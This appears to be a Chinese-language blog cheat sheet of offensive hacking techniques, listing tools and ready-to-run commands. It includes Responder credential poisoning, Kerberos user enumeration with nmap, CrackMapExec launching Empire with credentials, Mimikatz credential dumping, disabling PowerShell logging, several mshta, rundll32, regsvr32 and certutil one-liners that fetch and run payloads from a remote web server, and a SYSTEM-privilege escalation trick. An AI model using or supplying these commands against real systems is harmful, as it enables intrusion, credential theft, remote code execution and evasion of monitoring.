HACKER-USEFUL-GUIDE
十二月 25, 2021
- 网络发现
- 跨站脚本(XSS)
- 在没有凭证的网络上
- 枚举没有凭证的用户
- 从内存中提取明文文本凭证
- 脚本自动化配置
- 禁用日志记录
- windows下cmd从internet下载文件实例
- win从本地管理员获取系统权限
网络发现
- Burp Suite
- OWASP ZAP(开源)
- Dirbuster
- GoBuster:轻量级、快速的目录和子域名爆破工具
跨站脚本(XSS)
- BeFF(浏览器漏洞利用框架):将JavaScript静荷注入到浏览器中,创建一个命令和控制通道,以便javascript后期利用
- 分两部分:服务器,攻击静荷
- 盲XSS:执行存储的XSS静荷时看不到回显效果(例如:“联系我们”)
- XSS Hunter工具验证盲XSS
在没有凭证的网络上
- Responder工具
- http伪装windows验证:
sudo responder -I eth0 -wfFbw
- http伪装windows验证:
- MultiRelay.py
枚举没有凭证的用户
- nmap:
nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm="cyberspacekittens.local",userdb=/opt/userlist.txt 10.100.100.200
- CrackMapExec(CME)扫描:
cme smb 10.100.100.0/24 -d 'cyberspacekittens.local' -u 'neil.pawstrong' -p '.wertSDFG' -M empire_exec -o LISTENER=http
从内存中提取明文文本凭证
- (针对win10)Mimikatz
- (针对浏览器)Mimikittenz
脚本自动化配置
- RC脚本自动化Metasploit
- Empire自动化
- Conbalt Strike自动化
禁用日志记录
- 禁用powershell日志记录
windows下cmd从internet下载文件实例
- 利用windows“功能”:
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");windows.close();
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
certutil -urlcache -split -f http://server/payload payload
certutil -urlcache -split -f http://server/payload.b64 payload.b64 &certutil -decode payload.b64 payload.dll & C:\\Windows\Microsoft.NET\Framework64\ v4.0.30319\InstallUtil/logfile=/LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &certutil -decode payload.b64 payload.exe & payload.exe
win从本地管理员获取系统权限
- decoder-it创建一个PowerShell脚本,将本地管理Powershell提示符转换为System权限,通过创建一个新进程,设置新进程父类进程为系统进程。
- C:>
..\psgetsys.psl
- C:>
[MyProcess]::CreateProcessFromParent(<process_run_by_system>,<command_to_execute>)
- C:>
查看评论